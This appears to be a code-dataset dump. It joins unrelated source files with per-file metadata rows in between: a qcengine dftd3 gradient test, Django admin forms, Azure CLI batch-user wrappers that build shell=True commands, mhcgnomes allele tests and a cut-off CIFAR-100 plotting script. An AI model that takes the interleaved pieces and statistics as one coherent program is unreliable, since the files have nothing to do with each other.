    ids=['qmol', 'pmol', 'qcmol'])
@pytest.mark.parametrize("inp", [
    ({'parent': 'eneyne', 'name': 'd3-atmgr', 'subject': 'dimer', 'lbl': 'ATM'}),
    ({'parent': 'eneyne', 'name': 'd3-b3lyp-atmgr', 'subject': 'mA', 'lbl': 'ATM'}),
    ({'parent': 'eneyne', 'name': 'd3-pbe-atm(gr)', 'subject': 'mB', 'lbl': 'ATM'}),
    ({'parent': 'eneyne', 'name': 'd3-ATMgr', 'subject': 'mAgB', 'lbl': 'ATM'}),
    ({'parent': 'eneyne', 'name': 'd3-atmgr', 'subject': 'gAmB', 'lbl': 'ATM'}),
    ({'parent': 'ne', 'name': 'd3-atmgr', 'subject': 'atom', 'lbl': 'ATM'}),
]) # yapf: disable
def test_dftd3__run_dftd3__3body(inp, subjects, request):
    """dftd3 3-body (ATM) gradient run: reference values must appear under
    CURRENT, generic, 3-BODY, and AXILROD-TELLER-MUTO QCVariables."""
    subject = subjects()[inp['parent']][inp['subject']]
    expected = ref[inp['parent']][inp['lbl']][inp['subject']]
    gexpected = gref[inp['parent']][inp['lbl']][inp['subject']].ravel()
    # qcschema fixtures are already schema dicts; Molecule objects need conversion.
    if 'qcmol' in request.node.name:
        mol = subject
    else:
        mol = subject.to_schema(dtype=2)
    resinp = {
        'schema_name': 'qcschema_input',
        'schema_version': 1,
        'molecule': mol,
        'driver': 'gradient',
        'model': {
            'method': inp['name']
        },
        'keywords': {},
    }
    jrec = qcng.compute(resinp, 'dftd3', raise_error=True)
    jrec = jrec.dict()
    assert len(jrec['extras']['qcvars']) == 8
    assert compare_values(expected, jrec['extras']['qcvars']['CURRENT ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars']['DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars']['3-BODY DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(expected,
                          jrec['extras']['qcvars']['AXILROD-TELLER-MUTO 3-BODY DISPERSION CORRECTION ENERGY'],
                          atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['CURRENT GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['3-BODY DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected,
                          jrec['extras']['qcvars']['AXILROD-TELLER-MUTO 3-BODY DISPERSION CORRECTION GRADIENT'],
                          atol=1.e-7)
| 50.031868
| 138
| 0.66652
| 5,744
| 45,529
| 5.23172
| 0.085306
| 0.228412
| 0.256963
| 0.261123
| 0.865429
| 0.832252
| 0.794083
| 0.76836
| 0.713687
| 0.701175
| 0
| 0.450242
| 0.152694
| 45,529
| 909
| 139
| 50.086909
| 0.328745
| 0.023282
| 0
| 0.553398
| 0
| 0
| 0.128584
| 0
| 0
| 0
| 0
| 0
| 0.053398
| 1
| 0.01699
| false
| 0
| 0.012136
| 0.001214
| 0.033981
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
be4d32813913f9706eedc11c2e371d8d4cadf975
| 6,914
|
py
|
Python
|
myadmin/forms.py
|
Hoofeycheng/videoproject
|
ebb7df4d07085f9e4adeac8273ea19ff6f2667b6
|
[
"MIT"
] | null | null | null |
myadmin/forms.py
|
Hoofeycheng/videoproject
|
ebb7df4d07085f9e4adeac8273ea19ff6f2667b6
|
[
"MIT"
] | null | null | null |
myadmin/forms.py
|
Hoofeycheng/videoproject
|
ebb7df4d07085f9e4adeac8273ea19ff6f2667b6
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.core.exceptions import ValidationError
from users.models import User
from video.models import Video, Classification
class UserLoginForm(AuthenticationForm):
    """Admin login form.

    Overrides username/password to add length bounds and Chinese-language
    validation messages (user-facing strings left untranslated on purpose).
    """
    username = forms.CharField(min_length=4,max_length=30,
                               error_messages={
                                   'min_length': '用户名不少于4个字符',
                                   'max_length': '用户名不能多于30个字符',
                                   'required': '用户名不能为空',
                               },
                               widget=forms.TextInput(attrs={'placeholder': '请输入用户名'}))
    password = forms.CharField(min_length=8,max_length=30,
                               error_messages={
                                   'min_length': '密码不少于8个字符',
                                   'max_length': '密码不能多于30个字符',
                                   'required': '密码不能为空',
                               },
                               widget=forms.PasswordInput(attrs={'placeholder': '请输入密码'}))

    class Meta:
        model = User
        fields = ['username', 'password']
        # Shown when authentication fails ("wrong username or password").
        error_messages = {'invalid_login': '用户名或密码错误', }
class VideoPublishForm(forms.ModelForm):
    """Form for publishing a new video: title, description, cover image,
    classification; `status` is a hidden field fixed to '0' (draft-like
    initial state — TODO confirm meaning against the Video model)."""
    title = forms.CharField(min_length=4, max_length=200, required=True,
                            error_messages={
                                'min_length': '至少4个字符',
                                'max_length': '不能多于200个字符',
                                'required': '标题不能为空'
                            },
                            widget=forms.TextInput(attrs={'placeholder': '请输入内容'}))
    desc = forms.CharField(min_length=4, max_length=200, required=True,
                           error_messages={
                               'min_length': '至少4个字符',
                               'max_length': '不能多于200个字符',
                               'required': '描述不能为空'
                           },
                           widget=forms.Textarea(attrs={'placeholder': '请输入内容'}))
    cover = forms.ImageField(required=True,
                             error_messages={
                                 'required': '封面不能为空'
                             },
                             widget=forms.FileInput(attrs={'class' : 'n'}))
    # Hidden, preset to '0' so newly published videos start in that status.
    status = forms.CharField(min_length=1, max_length=1, required=False,
                             widget=forms.HiddenInput(attrs={'value':'0'}))

    class Meta:
        model = Video
        fields = ['title', 'desc','status', 'cover', 'classification']
class VideoEditForm(forms.ModelForm):
    """Form for editing an existing video; identical fields to
    VideoPublishForm except `status` is hidden without a preset value."""
    title = forms.CharField(min_length=4, max_length=200, required=True,
                            error_messages={
                                'min_length': '至少4个字符',
                                'max_length': '不能多于200个字符',
                                'required': '标题不能为空'
                            },
                            widget=forms.TextInput(attrs={'placeholder': '请输入内容'}))
    desc = forms.CharField(min_length=4, max_length=200, required=True,
                           error_messages={
                               'min_length': '至少4个字符',
                               'max_length': '不能多于200个字符',
                               'required': '描述不能为空'
                           },
                           widget=forms.Textarea(attrs={'placeholder': '请输入内容'}))
    cover = forms.ImageField(required=True,
                             error_messages={
                                 'required': '封面不能为空'
                             },
                             widget=forms.FileInput(attrs={'class' : 'n'}))
    status = forms.CharField(min_length=1,max_length=1,required=False,
                             widget=forms.HiddenInput())

    class Meta:
        model = Video
        fields = ['title', 'desc', 'status', 'cover','classification']
class UserAddForm(forms.ModelForm):
    """Form for creating a user from the admin; same username/password
    constraints as the login form, plus the is_staff flag."""
    username = forms.CharField(min_length=4,max_length=30,
                               error_messages={
                                   'min_length': '用户名不少于4个字符',
                                   'max_length': '用户名不能多于30个字符',
                                   'required': '用户名不能为空',
                               },
                               widget=forms.TextInput(attrs={'placeholder': '请输入用户名'}))
    password = forms.CharField(min_length=8,max_length=30,
                               error_messages={
                                   'min_length': '密码不少于8个字符',
                                   'max_length': '密码不能多于30个字符',
                                   'required': '密码不能为空',
                               },
                               widget=forms.PasswordInput(attrs={'placeholder': '请输入密码'}))

    class Meta:
        model = User
        fields = ['username', 'password','is_staff' ]
def username_validate(value):
    """Field validator: forbid editing the reserved 'admin' superuser name."""
    if value != "admin":
        return
    raise ValidationError('不能编辑超级管理员')
class UserEditForm(forms.ModelForm):
    """Form for editing a user; username_validate blocks renames touching
    the reserved 'admin' account. Password is intentionally not editable here."""
    username = forms.CharField(min_length=4, max_length=30, required=True,
                               validators=[username_validate],
                               error_messages={
                                   'min_length': '至少4个字符',
                                   'max_length': '不能多于30个字符',
                                   'required': '用户名不能为空'
                               },
                               widget=forms.TextInput(attrs={'placeholder': '请输入用户名'}))

    class Meta:
        model = User
        fields = ['username','is_staff']
class ClassificationAddForm(forms.ModelForm):
    """Form for creating a video classification (category): title + status."""
    title = forms.CharField(min_length=2, max_length=30, required=True,
                            error_messages={
                                'min_length': '至少2个字符',
                                'max_length': '不能多于30个字符',
                                'required': '不能为空'
                            },
                            widget=forms.TextInput(attrs={'placeholder': '请输入分类名称'}))

    class Meta:
        model = Classification
        fields = ['title', 'status' ]
class ClassificationEditForm(forms.ModelForm):
    """Form for editing a classification; field-for-field identical to
    ClassificationAddForm (kept separate so the two can diverge later)."""
    title = forms.CharField(min_length=2, max_length=30, required=True,
                            error_messages={
                                'min_length': '至少2个字符',
                                'max_length': '不能多于30个字符',
                                'required': '不能为空'
                            },
                            widget=forms.TextInput(attrs={'placeholder': '请输入分类名称'}))

    class Meta:
        model = Classification
        fields = ['title','status']
| 44.320513
| 90
| 0.453572
| 502
| 6,914
| 6.109562
| 0.187251
| 0.073362
| 0.0776
| 0.104989
| 0.813825
| 0.809912
| 0.799478
| 0.787414
| 0.768829
| 0.768829
| 0
| 0.020919
| 0.439977
| 6,914
| 156
| 91
| 44.320513
| 0.771178
| 0.029795
| 0
| 0.713178
| 0
| 0
| 0.145563
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007752
| false
| 0.046512
| 0.03876
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
beb59c019310405492753fb8c5abc4f8e2f10488
| 1,834
|
py
|
Python
|
test/pyaz/batch/node/user/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/batch/node/user/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/batch/node/user/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def create(pool_id, node_id, name=None, is_admin=None, expiry_time=None, password=None, ssh_public_key=None, json_file=None, account_name=None, account_key=None, account_endpoint=None):
    """Run ``az batch node user create`` and return its parsed JSON output.

    All keyword arguments are forwarded to the CLI via get_params(locals()).
    Returns the decoded JSON object on success; raises Exception carrying the
    CLI's stderr when the command produced no stdout.
    """
    params = get_params(locals())
    command = "az batch node user create " + params
    print(command)
    # NOTE(review): shell=True with a string-built command line — argument
    # values are interpolated by get_params(); confirm it quotes/escapes them,
    # otherwise prefer subprocess.run([...], shell=False) with a list.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        # Fix: removed print() calls that were unreachable after return/raise.
        raise Exception(stderr)
def delete(pool_id, node_id, user_name, yes=None, account_name=None, account_key=None, account_endpoint=None):
    """Run ``az batch node user delete`` and return its JSON output as a dict.

    Raises:
        Exception: carrying the CLI's stderr text when the command produced
            no stdout.
    """
    params = get_params(locals())
    # NOTE(review): shell=True with string-interpolated params is shell-injection
    # prone; get_params is presumed to quote values -- confirm.
    command = "az batch node user delete " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Original had an unreachable print(stdout) after this return; removed.
        return json.loads(stdout)
    else:
        # Original had an unreachable print(stderr) after this raise; removed.
        raise Exception(stderr)
def reset(pool_id, node_id, user_name, password=None, expiry_time=None, ssh_public_key=None, json_file=None, account_name=None, account_key=None, account_endpoint=None):
    """Run ``az batch node user reset`` and return its JSON output as a dict.

    Raises:
        Exception: carrying the CLI's stderr text when the command produced
            no stdout.
    """
    params = get_params(locals())
    # NOTE(review): shell=True with string-interpolated params is shell-injection
    # prone; get_params is presumed to quote values -- confirm.
    command = "az batch node user reset " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        # Original had an unreachable print(stdout) after this return; removed.
        return json.loads(stdout)
    else:
        # Original had an unreachable print(stderr) after this raise; removed.
        raise Exception(stderr)
| 39.869565
| 185
| 0.689749
| 245
| 1,834
| 5.028571
| 0.212245
| 0.080357
| 0.048701
| 0.029221
| 0.859578
| 0.859578
| 0.82711
| 0.82711
| 0.82711
| 0.82711
| 0
| 0.004068
| 0.195747
| 1,834
| 45
| 186
| 40.755556
| 0.831186
| 0
| 0
| 0.804878
| 0
| 0
| 0.058342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0.04878
| 0.04878
| 0
| 0.195122
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bec1de71110b57f69888dd52f597cfcfd2beb472
| 4,776
|
py
|
Python
|
test/test_allele.py
|
til-unc/mhcgnomes
|
0bfbe193daeb7cd38d958222f6071dd657e9fb6e
|
[
"Apache-2.0"
] | 6
|
2020-10-27T15:31:32.000Z
|
2020-11-29T03:26:06.000Z
|
test/test_allele.py
|
til-unc/mhcgnomes
|
0bfbe193daeb7cd38d958222f6071dd657e9fb6e
|
[
"Apache-2.0"
] | 4
|
2020-10-27T14:57:16.000Z
|
2020-11-04T21:56:39.000Z
|
test/test_allele.py
|
pirl-unc/mhcgnomes
|
0bfbe193daeb7cd38d958222f6071dd657e9fb6e
|
[
"Apache-2.0"
] | null | null | null |
from mhcgnomes import Allele
from nose.tools import eq_
def test_allele_get_A0201():
    """HLA-A*02:01 parses into species prefix, gene name and two allele fields."""
    result = Allele.get("HLA", "A", "02", "01")
    assert result is not None and type(result) is Allele
    eq_(result.species_prefix, "HLA")
    eq_(result.gene_name, "A")
    eq_(list(result.allele_fields), ["02", "01"])
    eq_(result.mhc_class, "Ia")
def test_restrict_num_allele_fields_A02010101():
    """Restricting an 8-digit (4-field) allele to 2 fields yields a 4-digit allele."""
    full_res = Allele.get("HLA", "A", "02", "01", "01", "01")
    assert full_res is not None and type(full_res) is Allele
    eq_(full_res.num_allele_fields, 4)
    truncated = full_res.restrict_allele_fields(2)
    eq_(truncated.num_allele_fields, 2)
def test_no_annotations():
    """An allele created without an annotation has every annotation flag off."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert not getattr(allele, "annotation_" + flag)
def test_annotation_null():
    """annotation="N" turns on exactly the null flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="N")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "null")
def test_annotation_cytosolic():
    """annotation="C" turns on exactly the cystosolic flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="C")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "cystosolic")
def test_annotation_secreted():
    """annotation="S" turns on exactly the secreted flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="S")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "secreted")
def test_annotation_questionable():
    """annotation="Q" turns on exactly the questionable flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="Q")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "questionable")
def test_annotation_group():
    """annotation="G" turns on exactly the group flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="G")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "group")
def test_annotation_splice_variant():
    """annotation="Sp" turns on exactly the splice_variant flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="Sp")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "splice_variant")
def test_annotation_pseudogene():
    """annotation="Ps" turns on exactly the pseudogene flag and nothing else."""
    allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="Ps")
    for flag in ("null", "cystosolic", "aberrant_expression", "secreted",
                 "pseudogene", "questionable", "low_expression", "group",
                 "splice_variant"):
        assert bool(getattr(allele, "annotation_" + flag)) == (flag == "pseudogene")
| 39.8
| 76
| 0.764657
| 607
| 4,776
| 5.766063
| 0.097199
| 0.329143
| 0.278571
| 0.464286
| 0.863429
| 0.863429
| 0.839143
| 0.819429
| 0.819429
| 0.804
| 0
| 0.02355
| 0.15536
| 4,776
| 119
| 77
| 40.134454
| 0.844075
| 0
| 0
| 0.619048
| 0
| 0
| 0.028266
| 0
| 0
| 0
| 0
| 0
| 0.72381
| 1
| 0.095238
| false
| 0
| 0.019048
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fe35a3b2938c3a9695a40ff8f464099558b920bb
| 15,070
|
py
|
Python
|
plot_cifar100.py
|
VamshiTeja/SMDL
|
0dda36df9d0f2f921f365cc644f61dd81798693c
|
[
"MIT"
] | 16
|
2019-06-05T05:18:56.000Z
|
2021-10-30T00:29:54.000Z
|
plot_cifar100.py
|
VamshiTeja/SMDL
|
0dda36df9d0f2f921f365cc644f61dd81798693c
|
[
"MIT"
] | 5
|
2020-01-13T10:49:58.000Z
|
2022-03-11T23:48:55.000Z
|
plot_cifar100.py
|
VamshiTeja/SMDL
|
0dda36df9d0f2f921f365cc644f61dd81798693c
|
[
"MIT"
] | 6
|
2019-06-06T15:40:05.000Z
|
2020-08-11T12:46:58.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import sys, os
from lib.config import cfg
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
def plot_accuracies(data, title='Accuracy Plot', plot_type='Accuracy', x_axis_label='Epochs',save_location=None, mode='Test'):
    """
    Plot accuracy/loss curves saved using lib.utils.save_accuracies().

    :param data: list of entries [pkl_path, label, color(, upper_pkl, lower_pkl)];
                 an entry labeled exactly 'SGD' must carry the two extra pickle
                 paths, which are used to draw a shaded min/max band.
    :param title: used only to build the output file name (spaces/parens -> '_').
    :param plot_type: 'Accuracy' (values plotted as error = 100 - acc) or 'Loss'.
    :param x_axis_label: x-axis label.
    :param save_location: output directory; defaults to './final_plots/cifar100/'.
    :param mode: 'Test' or 'Train'; selects the y-axis label.
    :return: None
    """
    plt.tick_params(direction='out', length=6, width=2)
    if save_location is None:  # was `== None`; identity test is the correct idiom
        save_location = './final_plots/cifar100/'
    # exist_ok avoids the check-then-create race of the original exists()+makedirs()
    os.makedirs(save_location, exist_ok=True)
    for info in data:  # enumerate index was unused
        with open(info[0], 'rb') as f:
            acc = pickle.load(f)
        _plot_indiv_accuracies(acc, color=info[2], label=info[1], plot_type=plot_type)
        # NOTE(review): the shaded band is drawn only for the literal label 'SGD';
        # ablation entries labeled 'Random Selection' carry limit files but get
        # no band -- confirm that is intended.
        if info[1] == 'SGD':
            with open(info[3], 'rb') as f:
                upper_limit = pickle.load(f)
            with open(info[4], 'rb') as f:
                lower_limit = pickle.load(f)
            x = np.arange(1, len(acc) + 1)
            if plot_type == "Accuracy":
                # Convert accuracies to error rates so the band matches the curves.
                lower_limit = 100 - lower_limit
                upper_limit = 100 - upper_limit
            plt.fill_between(x, lower_limit, upper_limit, color='lightskyblue')
    size = 15
    plt.legend(fontsize=size)
    plt.xlabel(x_axis_label, fontsize=size)
    plt.grid(True, linestyle='--', axis='y')
    if plot_type == 'Accuracy':
        plt.yticks(np.arange(0, 110, step=10))
        if mode == 'Test':
            plt.ylabel('Test Error', fontsize=size)
        elif mode == 'Train':
            plt.ylabel('Train Error', fontsize=size)
        plt.ylim([35, 70])
    else:
        if mode == 'Test':
            plt.ylabel('Test Loss', fontsize=size)
        elif mode == 'Train':
            plt.ylabel('Train Loss', fontsize=size)
        plt.ylim([1, 4])
    plt.savefig(save_location + title.replace(' ', '_').replace('(', '_').replace(')', '_') + '.eps', format='eps')
    plt.close()
def _plot_indiv_accuracies(accuracies, color='blue', label='', plot_type=None):
    """Plot one curve on the current axes.

    For plot_type 'Accuracy' the values are flipped to error rates (100 - acc)
    before plotting; any other plot_type plots the raw values.
    """
    x = np.arange(1, len(accuracies) + 1)
    if plot_type == 'Accuracy':  # was `if(plot_type=='Accuracy')`
        accuracies = 100 - np.array(accuracies)
    plt.plot(x, accuracies, color=color, label=label)
if __name__ == '__main__':
    # Disabled per-epoch plotting loop kept for reference.
    #
    # for i in range(1, 61):
    #     try:
    #         test_data = [[
    #             '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_ResNet20_0211_152357/accuracies/test_acc_between_iteration_epoch_' + str(i) + '_accuracy.pkl',
    #             'SGD', 'blue'],
    #             [
    #             '/home/vamshi/PycharmProjects/SMDL/output/cifar100_resnet32_submodcomb_refresh-5_epochs-60_0203_103925/accuracies/test_acc_between_iteration_epoch_' + str(i) + '_accuracy.pkl',
    #             'Submodular Selection', 'green']
    #         ]
    #         plot_accuracies(test_data, title='CIFAR100 Epoch ' + str(i) + ' Test Accuracy', x_axis_label='# of iterations (x10)')
    #     except Exception as error:
    #         print ('Exception occured for index {}, {}'.format(i, error))
    # # CIFAR - 100
    # -------------------
    # Main comparison: SGD (with min/max band) vs LOSS vs SMDL.
    # Each entry: [pickle path, legend label, color(, upper-limit pkl, lower-limit pkl)].
    test_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_mean_accuracy.pkl',
        'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_lower_limit_accuracy.pkl'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_round_0_accuracy.pkl',
        'LOSS', 'darkviolet'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_acc_round_0_accuracy.pkl',
        'SMDL', 'green']
    ]
    plot_accuracies(test_data, title='CIFAR 100 Test Accuracy (Main)')
    train_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_mean_accuracy.pkl',
        'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_lower_limit_accuracy.pkl'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_round_0_accuracy.pkl',
        'LOSS', 'darkviolet'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/train_acc_round_0_accuracy.pkl',
        'SMDL', 'green']
    ]
    plot_accuracies(train_data, title='CIFAR 100 Train Accuracy (Main)')
    test_loss_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_mean_accuracy.pkl',
        'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_lower_limit_accuracy.pkl'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_round_0_accuracy.pkl',
        'LOSS', 'darkviolet'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL', 'green']
    ]
    plot_accuracies(test_loss_data, title='CIFAR 100 Test Loss (Main)', plot_type='Loss')
    train_loss_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_mean_accuracy.pkl',
        'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_lower_limit_accuracy.pkl'],
        [
        # NOTE(review): TRAIN-loss figure but the next two entries read test_loss
        # pickles -- looks like a copy-paste slip; confirm against the data files.
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_round_0_accuracy.pkl',
        'LOSS', 'darkviolet'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
        'SMDL', 'green']
    ]
    plot_accuracies(train_loss_data, title='CIFAR 100 Train Loss (Main)', plot_type='Loss')
    ############## ablations ###############
    ########## refresh rate ##############
    # Refresh-rate ablation: random selection band vs SMDL at refresh rates 5-40.
    test_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_mean_accuracy.pkl',
        'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_lower_limit_accuracy.pkl'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-5', 'green'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/test_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-10', 'orange'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/test_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-25', 'm'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/test_acc_round_0_accuracy.pkl',
        'SMDL Refresh Rate-40', 'black'],
        # [
        # '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/test_acc_round_0_accuracy.pkl',
        # 'SMDL Refresh Rate-50', 'black']
    ]
    plot_accuracies(test_data, title='CIFAR 100 Test Error with RF Ablation', save_location='./final_plots/cifar100/Refresh/')
    train_data = [[
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_mean_accuracy.pkl',
        'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_upper_limit_accuracy.pkl',
        '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_lower_limit_accuracy.pkl'],
        [
        '/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/train_acc_round_0_accuracy.pkl',
